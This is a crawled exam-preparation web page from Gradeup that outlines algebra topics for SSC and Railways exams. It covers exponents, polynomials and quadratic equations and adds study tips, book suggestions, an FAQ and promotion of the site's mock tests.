{"ft_lang_label":"__label__en","ft_lang_prob":0.5965141,"math_prob":0.9999082,"size":2255,"snap":"2019-43-2019-47","text_gpt3_token_len":937,"char_repetition_ratio":0.22612172,"word_repetition_ratio":0.0,"special_character_ratio":0.39334813,"punctuation_ratio":0.045548655,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999888,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-19T10:47:29Z\",\"WARC-Record-ID\":\"<urn:uuid:fd367e1f-35c2-49d4-bf4f-d7be7f177b25>\",\"Content-Length\":\"141699\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:df1c2726-05ec-4b0a-a1fa-5248291d8b5a>\",\"WARC-Concurrent-To\":\"<urn:uuid:db107cca-7660-4fe0-8d91-70168828f3a0>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/questions/218616/how-to-fourier-transform-creation-annihilation-operators\",\"WARC-Payload-Digest\":\"sha1:XHUYEC5L2NGVES7M7PEO26WTYP4EFDO2\",\"WARC-Block-Digest\":\"sha1:BOTYN6EJF2PX7GDMIYOQAVU5CE35VJDO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986692723.54_warc_CC-MAIN-20191019090937-20191019114437-00050.warc.gz\"}"}
https://gradeup.co/ssc-exams/algebra
[ "# Algebra for SSC and Railways Exams\n\nBy : Neha Uppal\n\nUpdated : Nov 6, 2020, 14:39\n\nAlgebra for SSC CGL has a good weightage so if you are preparing for these exams. Mathematics is a very wide subject that has different parts, including geometry, theory, and analysis concepts. Algebra is one of the most appreciated parts of applied Mathematical subjects. Applications of Algebra are widespread, whether it is solving complicated equations, handling data, or finding out the volume of water in a tank, calculating the velocity of your car; it is used everywhere and in various situations in day to day life. It is a vital subject when it comes to competitive exams so being very sure about your knowledge and concepts are all clear.\n\nGiven below are all the details concerning Algebra questions asked in SSC & Railway Exams. Find out the best way to prepare the Algebra questions, recommended books, tips to solve the questions, and more.\n\n## Important topics of algebra for SSC Exam\n\n Topic Explanation Introduction to Algebra Algebra is an integral and essential part of mathematics. Here we use different symbols, operations and numbers to deal with problems. Exponents Power of a number is referred to as exponent i. e. if a number say 'm' is multiplied to itself 'n' times (m*m*m....upto n times), it is represented as m^n (m raised to power n) where 'm' is the base and 'n' is the exponent.For example -For 2^5 (2*2*2*2*2), '2' is the base, and '5' is the exponent. Simplification There are various tricks and ways which we follow to simplify complex expressions. Some of the methods are BODMAS, modulus of a real number (modulus of a real number x is denoted |x| and it is the value of the number taken with a positive sign. Polynomials Polynomials form the base of algebra. An expression of the form ax^4 + x^3 - ax^2 + ax; where real numbers and the powers of variables are non-negative integers; i.e. 0,1,2….. Quadratic Equations Degree two polynomial equations are called quadratic equations, which means an equation that has the highest power of variable 2. The standard form of Q.E where a,b,c are constant real numbers (where a is not equal to 0) and x is the variable. A Q.E has two roots or two zeros.\n\n### Tips to prepare Algebra questions for SSC CGL\n\n• Be very thorough with your concepts.\n• Learn all the important topics under Algebra.\n• Keep all the Algebra formulas for SSC CGL on your fingertips.\n\n### Importance of Algebra in Quantitative Section of Competitive Banking & Government Exams\n\n• Has a high weightage.\n• Algebra questions for SSC CGLmains are scoring\n• They are easy\n• Concept-based questions.\n\n## Most Recommended Books for learning Algebra\n\nThe books you should refer to study algebra questions for SSC CGL mains include Algebra for SSC CGL and SSC Algebra (Volume 1 and 2).\n\n### Why prepare Algebra from Gradeup?\n\nMathematics is very important, and a bit difficult needs special attention. We need to learn specific topics with utmost finesse because their importance in competitive exams is high, just like Algebra. Here is why you should prepare from Gradeup:\n\n1. You can select your exam category and then start your preparations.\n2. You can take online mock tests.\n3. There are fresh questionnaires that are created by experts.\n4. You can check the detailed solutions and performance analysis.\n5. Full-length mock tests are available here.\n6. You can practice the mock papers in Hindi as well as English on Gradeup.\n\nQ1. What are the important topics of Algebra?\n\nA1. Though there are many important topics that you need to learn in algebra but to get a good grasp in this topic; you should be aware of everything related to polynomials, quadratic equations, basic algebra, exponents, and simplification.\n\nQ2. Is Algebra important WRT competitive studies?\n\nA2. Algebra plays a vital role in the mathematics section of every competitive exam. It is important because it not just helps you in solving questions in the exams, but it also is an answer to many of your days to day life problems.\n\nQ3. Are there any branches of Algebra?\n\nA3. Yes, you have various branches of Algebra including Elementary Algebra, Advanced Algebra, Abstract Algebra, Linear and commutative Algebra.\n\nQ4. Is it important to learn polynomials?\n\nA4. Whenever we talk about Algebra, “polynomials” is a topic that comes up in without a miss. You need to understand this topic for sure if you wish to score well in this topic.\n\nQ5. What if I am unable to complete Algebra? Can I skip it?\n\nA5. Algebra is an important topic that holds a lot of marks. If you leave this topic, you are going to lose a lot of marks. So, it is advised by math-experts that while studying math topics for your competitive exam, make sure to learn Algebra by heart.\n\nCreate bold facebook comments with TextFancy.com, convert and browse unicode characters. Generate ascii art and play with text.\n\nPosted by:", null, "Member since Oct 2018\n4+ Years of experience as a mentor and content developer for SSC & Railways exam. Cleared various exams including SSC CHSL & SSC CGL exams.", null, "GradeStack Learning Pvt. Ltd.Windsor IT Park, Tower - A, 2nd Floor, Sector 125, Noida, Uttar Pradesh 201303 [email protected]" ]
[ null, "https://gs-post-images.grdp.co/2018/12/screenshot-2018-12-21-at-3-img1545387500435-75.png-rs-high-webp.png", null, "https://gs-post-images.grdp.co/2018/12/screenshot-2018-12-21-at-3-img1545387500435-75.png-rs-high-webp.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93391293,"math_prob":0.8224255,"size":4797,"snap":"2021-31-2021-39","text_gpt3_token_len":1058,"char_repetition_ratio":0.13227624,"word_repetition_ratio":0.0,"special_character_ratio":0.21325828,"punctuation_ratio":0.12034079,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9846185,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-03T05:09:55Z\",\"WARC-Record-ID\":\"<urn:uuid:2ebd7f39-3e99-4536-a47d-4b4ab0adb775>\",\"Content-Length\":\"205471\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d1746916-b991-434d-9937-b79731c08cb5>\",\"WARC-Concurrent-To\":\"<urn:uuid:28e3788e-4c0e-427b-9445-09bc48b735ba>\",\"WARC-IP-Address\":\"104.17.13.38\",\"WARC-Target-URI\":\"https://gradeup.co/ssc-exams/algebra\",\"WARC-Payload-Digest\":\"sha1:TGUDNBXWSVHMCBBJ3Z7P7M7PRJPK7D26\",\"WARC-Block-Digest\":\"sha1:335TEJ6Y3MKCL4OD6HTIJINW7DFXGFPV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154420.77_warc_CC-MAIN-20210803030201-20210803060201-00604.warc.gz\"}"}